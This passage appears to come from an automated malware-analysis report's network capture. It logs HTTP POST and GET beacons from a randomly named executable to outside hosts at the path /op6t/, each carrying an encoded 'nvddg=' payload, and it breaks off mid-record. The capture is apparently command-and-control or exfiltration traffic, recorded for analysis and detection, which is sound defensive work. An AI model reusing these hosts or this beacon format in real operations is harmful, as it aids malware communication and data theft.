                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 7a 34 79 79 2b 72 68 2f 50 4f 41 30 68 30 49 48 63 57 47 74 2f 78 30 42 48 49 57 2f 2b 54 34 54 6b 59 62 32 4d 65 4e 62 4d 79 51 74 36 44 38 50 7a 78 57 67 59 36 6d 36 4d 2f 48 4c 61 61 51 42 42 62 66 79 50 61 52 48 58 63 41 64 49 71 37 71 65 44 37 79 62 54 69 2f 52 52 70 68 37 42 4a 4a 38 49 57 4b 66 6c 52 35 51 56 63 59 6e 77 4f 4d 32 4b 62 68 6a 6d 76 6a 79 5a 73 6f 47 31 78 45 4c 50 4e 6c 5a 73 53 79 37 34 4e 35 57 76 6d 63 4a 64 34 4d 75 2b 44 58 77 69 39 31 70 72 6e 79 63 48 34 44 72 55 6b 2f 76 73 6c 6d 2f 42 41 4e 62 2b 45 65 33 34 52 79 52 30 51 73 53 71 58 32 46 51 3d 3d
                                                                        Data Ascii: nvddg=z4yy+rh/POA0h0IHcWGt/x0BHIW/+T4TkYb2MeNbMyQt6D8PzxWgY6m6M/HLaaQBBbfyPaRHXcAdIq7qeD7ybTi/RRph7BJJ8IWKflR5QVcYnwOM2KbhjmvjyZsoG1xELPNlZsSy74N5WvmcJd4Mu+DXwi91prnycH4DrUk/vslm/BANb+Ee34RyR0QsSqX2FQ==


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        35192.168.11.3049831139.162.5.234807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:34:40.434447050 CEST791OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.tycent520test.com
                                                                        Origin: http://www.tycent520test.com
                                                                        Referer: http://www.tycent520test.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 7a 34 79 79 2b 72 68 2f 50 4f 41 30 6e 6c 59 48 66 78 79 74 75 52 30 41 5a 34 57 2f 30 7a 35 55 6b 59 6e 32 4d 66 4a 31 4d 42 6b 74 36 6d 41 50 68 6a 2b 67 66 36 6d 36 5a 50 48 4b 48 4b 51 65 42 62 44 41 50 61 74 48 58 63 55 64 49 6f 54 71 66 79 37 78 61 44 69 39 5a 78 70 6a 6a 68 4a 4a 38 49 57 4b 66 6c 30 75 51 52 49 59 6e 41 2b 4d 32 76 32 33 70 47 76 67 69 70 73 6f 43 31 78 41 4c 50 4e 44 5a 70 7a 36 37 37 31 35 57 74 75 63 49 4d 34 50 6c 2b 44 52 30 69 39 6d 36 2b 53 31 48 30 46 77 67 44 34 68 69 4e 64 7a 2b 57 78 58 47 39 77 63 6b 59 74 66 4e 31 39 45 51 6f 57 74 59 62 34 37 55 43 77 72 52 58 42 7a 72 57 71 41 4a 30 31 6a 6f 63 59 3d
                                                                        Data Ascii: nvddg=z4yy+rh/POA0nlYHfxytuR0AZ4W/0z5UkYn2MfJ1MBkt6mAPhj+gf6m6ZPHKHKQeBbDAPatHXcUdIoTqfy7xaDi9ZxpjjhJJ8IWKfl0uQRIYnA+M2v23pGvgipsoC1xALPNDZpz67715WtucIM4Pl+DR0i9m6+S1H0FwgD4hiNdz+WxXG9wckYtfN19EQoWtYb47UCwrRXBzrWqAJ01jocY=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        36192.168.11.3049832139.162.5.234807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:34:43.327738047 CEST1708OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.tycent520test.com
                                                                        Origin: http://www.tycent520test.com
                                                                        Referer: http://www.tycent520test.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 7a 34 79 79 2b 72 68 2f 50 4f 41 30 6e 6c 59 48 66 78 79 74 75 52 30 41 5a 34 57 2f 30 7a 35 55 6b 59 6e 32 4d 66 4a 31 4d 42 38 74 37 54 4d 50 7a 53 2b 67 65 36 6d 36 59 50 48 58 48 4b 51 54 42 62 4b 4a 50 61 68 39 58 5a 51 64 4a 4a 7a 71 57 67 54 78 54 44 69 39 56 52 70 75 37 42 4a 6d 38 49 47 4f 66 6c 45 75 51 52 49 59 6e 44 6d 4d 77 36 61 33 76 47 76 6a 79 5a 73 65 47 31 78 6f 4c 4c 6f 32 5a 70 33 71 37 4c 56 35 56 4e 2b 63 46 65 51 50 6e 65 44 54 7a 69 38 37 36 2b 57 36 48 30 59 42 67 48 34 62 69 50 39 7a 2b 69 34 36 58 70 30 64 6d 35 64 47 4a 55 35 2f 54 70 36 47 61 59 74 5a 59 68 6f 36 47 44 51 43 31 78 53 76 62 58 70 35 39 63 38 36 52 33 64 54 45 67 49 30 31 38 79 48 74 47 52 33 47 37 5a 37 6b 2f 6c 37 36 75 6c 79 72 43 57 33 58 54 57 54 38 70 49 6e 31 78 2b 63 31 4a 56 4f 52 57 46 62 6e 52 51 49 2b 57 6a 30 78 4c 55 5a 5a 78 36 4b 50 37 35 59 79 4b 42 48 59 34 79 34 4d 45 79 37 4a 49 73 4e 71 6c 4e 65 48 63 4a 57 77 38 74 57 2b 36 76 30 30 2f 63 77 43 4c 4d 56 44 4f 76 50 [TRUNCATED]
                                                                        Data Ascii: nvddg=z4yy+rh/POA0nlYHfxytuR0AZ4W/0z5UkYn2MfJ1MB8t7TMPzS+ge6m6YPHXHKQTBbKJPah9XZQdJJzqWgTxTDi9VRpu7BJm8IGOflEuQRIYnDmMw6a3vGvjyZseG1xoLLo2Zp3q7LV5VN+cFeQPneDTzi876+W6H0YBgH4biP9z+i46Xp0dm5dGJU5/Tp6GaYtZYho6GDQC1xSvbXp59c86R3dTEgI018yHtGR3G7Z7k/l76ulyrCW3XTWT8pIn1x+c1JVORWFbnRQI+Wj0xLUZZx6KP75YyKBHY4y4MEy7JIsNqlNeHcJWw8tW+6v00/cwCLMVDOvPtZz8fMQHfQNP/Z42HVdBoDqk9Zqt98BXVEtZnfGhP+FJnH4zXr0EkhI8yhqOj8mCxtPCxXwXT6+2BIltNvsiSiIqQpmOwNC+E5thIu6TZuOd211AF+rWZfBp9oJLoB5Dc1T3TXusaW6c+tV/4T4ame2r8FqyymiwZvi9yPJl3w+vDXwsRBpLrIhxFLrwN+xYWMW79mSe4qO9zBYE1duuBfNx7zVxAW5QsxqrJmv/uXpFftvnR6uBfpxi2H7xQwSzWm4WHjeITk6y8i6bGJ7JPGfcfA45kmZ4wXptHMOJqm9sQHCSx36juazy0BgjOY5zghZrhyYKkvdEp+BKVSUUD82StpDLaXZBL6zJN9wd38eXGoul6ujIPTXo9Dw8RsEAcUbamO1KFxJ7SQpH+KzS4MOLBWUYh/V85BROsnStThqMY4ohzT3jrLJYRNl3AXlT5zSjB8ZeIe92MPEdamKMLMXj3kcnOZYSJmH2eAsvBFqm9y8rUBgUO0zRT65syrMy5jzJpu1SLvdMIs0thhXQ1OuqtIKohJaUp/WymITN9e5+U/1BzaWyQleYE/rMcyFbf2H9XAl63Ry1/eNiRZ8p0juAiLVHXf4rElPBqKJByd7QSZnBprt4Tk/rb9RQCFoHHn3a/cTmY5jkZ9fiHigujmM1mmvpL2H8D/ [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        37192.168.11.3049833139.162.5.234807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:34:46.221949100 CEST490OUTGET /op6t/?nvddg=+6aS9fJbP9c9g0cefBC2hCdSY6eI42Bs0771KfpwNwRwjCkC9gP/ScKef//fPL1ZRbSBI6tgf+IRGYWXfXrYWSfcXSoVwh43zp6ZVipPdxItsiOM6ZnovEU=&x2=wN2xY HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.tycent520test.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:34:48.585594893 CEST562INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:34:48 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding, Cookie
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Location: http://tycent520test.com/op6t/?nvddg=+6aS9fJbP9c9g0cefBC2hCdSY6eI42Bs0771KfpwNwRwjCkC9gP/ScKef//fPL1ZRbSBI6tgf+IRGYWXfXrYWSfcXSoVwh43zp6ZVipPdxItsiOM6ZnovEU=&x2=wN2xY
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Data Raw: 36 0d 0a ef bb bf ef bb bf 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 60


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        38192.168.11.304983434.149.87.45807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:35:02.013325930 CEST786OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.century21morenoycia.mx
                                                                        Origin: http://www.century21morenoycia.mx
                                                                        Referer: http://www.century21morenoycia.mx/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 34 56 52 58 66 59 52 4c 43 49 58 67 6f 71 4c 76 50 34 32 34 38 66 47 6c 6f 77 31 6c 77 7a 62 33 50 61 6d 5a 4a 6a 56 54 6d 59 68 53 55 47 4a 79 6e 4d 69 55 68 36 69 57 71 52 79 77 71 33 37 4f 68 36 70 79 30 67 66 69 50 77 74 67 67 69 44 62 4e 6a 6f 7a 69 39 4f 55 50 68 61 71 31 32 4e 74 64 4f 43 38 64 41 54 49 39 51 72 44 38 55 35 45 42 2b 57 6f 46 4f 5a 43 69 52 62 30 43 79 42 51 59 6c 43 72 68 5a 77 79 39 46 6a 66 4c 4d 32 77 43 59 38 39 51 42 49 35 79 4b 4e 74 6c 58 2f 6f 39 50 51 69 44 6f 2f 4c 56 66 6b 33 42 58 70 4d 38 76 37 65 61 61 31 6d 68 43 64 61 5a 6a 49 6b 49 67 3d 3d
                                                                        Data Ascii: nvddg=4VRXfYRLCIXgoqLvP4248fGlow1lwzb3PamZJjVTmYhSUGJynMiUh6iWqRywq37Oh6py0gfiPwtggiDbNjozi9OUPhaq12NtdOC8dATI9QrD8U5EB+WoFOZCiRb0CyBQYlCrhZwy9FjfLM2wCY89QBI5yKNtlX/o9PQiDo/LVfk3BXpM8v7eaa1mhCdaZjIkIg==
                                                                        May 22, 2024 17:35:02.228631973 CEST1078INHTTP/1.1 403 Forbidden
                                                                        Content-Length: 548
                                                                        Content-Type: text/html
                                                                        Server: Pepyaka
                                                                        X-Wix-Request-Id: 1716392102.1269038556672615301
                                                                        X-Content-Type-Options: nosniff
                                                                        Accept-Ranges: bytes
                                                                        Date: Wed, 22 May 2024 15:35:02 GMT
                                                                        X-Served-By: cache-bfi-krnt7300112-BFI
                                                                        X-Cache: MISS
                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLkPYl3Dc4B5QnXwwDz84vBQG/hKs8AeY1T4OIbgnD+yx
                                                                        Via: 1.1 google
                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        39192.168.11.304983534.149.87.45807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:35:04.716804028 CEST806OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.century21morenoycia.mx
                                                                        Origin: http://www.century21morenoycia.mx
                                                                        Referer: http://www.century21morenoycia.mx/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 34 56 52 58 66 59 52 4c 43 49 58 67 70 4b 62 76 4f 5a 32 34 37 2f 47 6d 6e 51 31 6c 2b 54 62 7a 50 61 71 5a 4a 6d 30 4f 6d 72 56 53 56 6b 52 79 67 4f 61 55 67 36 69 57 68 78 79 31 75 33 37 2f 68 36 31 36 30 6b 58 69 50 77 70 67 67 69 7a 62 4e 77 77 38 6a 74 4f 57 61 52 61 30 78 32 4e 74 64 4f 43 38 64 41 48 75 39 51 54 44 39 6c 70 45 4f 37 69 72 61 2b 5a 46 6a 52 62 30 56 43 42 63 59 6c 43 46 68 62 45 55 39 44 6e 66 4c 4e 47 77 43 70 38 69 4c 52 49 2f 2f 71 4d 46 32 55 4b 43 39 64 35 58 4e 76 44 6b 54 4f 6f 67 4a 67 59 57 68 73 50 63 4a 36 4a 4c 39 44 77 79 62 68 4a 2f 56 6b 47 6b 38 31 48 38 68 7a 52 55 4e 78 66 4d 4f 37 43 42 69 6e 6f 3d
                                                                        Data Ascii: nvddg=4VRXfYRLCIXgpKbvOZ247/GmnQ1l+TbzPaqZJm0OmrVSVkRygOaUg6iWhxy1u37/h6160kXiPwpggizbNww8jtOWaRa0x2NtdOC8dAHu9QTD9lpEO7ira+ZFjRb0VCBcYlCFhbEU9DnfLNGwCp8iLRI//qMF2UKC9d5XNvDkTOogJgYWhsPcJ6JL9DwybhJ/VkGk81H8hzRUNxfMO7CBino=
                                                                        May 22, 2024 17:35:04.931837082 CEST1078INHTTP/1.1 403 Forbidden
                                                                        Content-Length: 548
                                                                        Content-Type: text/html
                                                                        Server: Pepyaka
                                                                        X-Wix-Request-Id: 1716392104.8279035854453713443
                                                                        X-Content-Type-Options: nosniff
                                                                        Accept-Ranges: bytes
                                                                        Date: Wed, 22 May 2024 15:35:04 GMT
                                                                        X-Served-By: cache-bfi-krnt7300093-BFI
                                                                        X-Cache: MISS
                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLjYvXQYrV/LrhbkNY01ADWAG/hKs8AeY1T4OIbgnD+yx
                                                                        Via: 1.1 google
                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        40192.168.11.304983634.149.87.45807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        May 22, 2024 17:35:07.418550968 CEST1723OUTPOST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.century21morenoycia.mx
                                                                        Origin: http://www.century21morenoycia.mx
                                                                        Referer: http://www.century21morenoycia.mx/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Raw: 6e 76 64 64 67 3d 34 56 52 58 66 59 52 4c 43 49 58 67 70 4b 62 76 4f 5a 32 34 37 2f 47 6d 6e 51 31 6c 2b 54 62 7a 50 61 71 5a 4a 6d 30 4f 6d 72 4e 53 55 56 78 79 6d 76 61 55 6d 4b 69 57 73 52 79 30 75 33 37 6d 68 36 39 2b 30 6b 54 55 50 79 68 67 76 6a 54 62 5a 52 77 38 74 74 4f 57 46 42 61 70 31 32 4e 38 64 4f 53 34 64 41 58 75 39 51 54 44 39 6d 68 45 48 4f 57 72 42 2b 5a 43 69 52 62 67 43 79 41 42 59 6c 4b 7a 68 62 41 69 39 7a 48 66 4c 74 57 77 52 72 45 69 48 52 49 39 36 71 4d 64 32 55 57 5a 39 63 55 75 4e 76 66 4b 54 4d 34 67 4c 33 31 54 36 64 37 51 55 6f 4e 43 69 48 77 4f 61 53 6c 47 54 58 54 47 34 30 44 48 6e 78 35 70 55 57 6a 79 62 35 79 70 67 58 64 4e 66 63 39 69 59 45 58 76 36 4b 71 72 66 4a 4f 6b 54 66 71 61 34 48 53 30 61 69 57 2b 4f 2f 58 65 73 51 54 52 39 6d 4f 41 78 31 2b 6e 4b 36 45 77 43 38 51 67 36 50 43 45 38 4c 53 79 7a 34 6f 79 54 35 52 6c 51 58 78 4e 66 46 55 48 34 64 61 6f 7a 65 61 53 68 48 34 31 55 79 6c 4b 77 54 66 57 48 43 31 53 32 6c 47 67 38 7a 42 49 55 70 4e 2f 6c 79 66 4e [TRUNCATED]
                                                                        Data Ascii: nvddg=4VRXfYRLCIXgpKbvOZ247/GmnQ1l+TbzPaqZJm0OmrNSUVxymvaUmKiWsRy0u37mh69+0kTUPyhgvjTbZRw8ttOWFBap12N8dOS4dAXu9QTD9mhEHOWrB+ZCiRbgCyABYlKzhbAi9zHfLtWwRrEiHRI96qMd2UWZ9cUuNvfKTM4gL31T6d7QUoNCiHwOaSlGTXTG40DHnx5pUWjyb5ypgXdNfc9iYEXv6KqrfJOkTfqa4HS0aiW+O/XesQTR9mOAx1+nK6EwC8Qg6PCE8LSyz4oyT5RlQXxNfFUH4daozeaShH41UylKwTfWHC1S2lGg8zBIUpN/lyfNVnfC5YNW4OWTimgj6mUmye+HdWUWo0yE4PxPhWTFVfYpPDfLzda3QadQsxQkVy3hD1TL7Twe9wVbzBOkgIJQNYKN2yEBA/n3Ektm47XZEZm2N2SJ4ncgO808N20CdqO1bkBLV2EtPv9P2LgX+wJ4dNtvV0+1PTpkpheGk2K2WK5wmVUlpArce3WsScSN2IfguRSQgDIgzUhKPjRFpEeMWInUa0mqAyKxLkuARZUbKqJK4waisLHOIEVkN6dWqKELk7CW/EvI05QgJwZHD25diOma8j7Ku2959cRtuhkVJIoAO3UQcRair4yNyyHos7l825ORcUuGUh+E/AUliu4pzHVQiysusjAFAX6YnTeeOtB4UvpjiokOCSGeV/YPiY80rTszlBg5A8fLsyp1XdeA3LtYApaeQZeEx0YWksSfY8iTI1beGgzhUeqhIi6O/XDI/jV/aWKOceTPVXT+32fvwjVtEWdLkrRApA920ipYNRxM1osSKuypQxPBDEWz0ePA2UPUFVPagQZ2Tcx9gLtBob1OCk5F9wcE0figQg285fZxo2PtrQn9+o4xXD/Duz4p4IJPcOETl9HF0I2rHrop3zmpT2qZI1m08r8C4fdt/wmRRagTPV7o4Zy27Q6a1Xz9WOgBpDs51hcqaM1GUs2dwPCP/90+sjpJQL [TRUNCATED]
                                                                        May 22, 2024 17:35:07.639972925 CEST1077INHTTP/1.1 403 Forbidden
                                                                        Content-Length: 548
                                                                        Content-Type: text/html
                                                                        Server: Pepyaka
                                                                        X-Wix-Request-Id: 1716392107.534903909656384024
                                                                        X-Content-Type-Options: nosniff
                                                                        Accept-Ranges: bytes
                                                                        Date: Wed, 22 May 2024 15:35:07 GMT
                                                                        X-Served-By: cache-bfi-krnt7300097-BFI
                                                                        X-Cache: MISS
                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLuuWLGLAwvTMYA8ArAuxUdgm++C2XkuTvnlRFg2XiSDL
                                                                        Via: 1.1 google
                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        41192.168.11.304983734.149.87.45807248C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        TimestampBytes transferredDirectionData
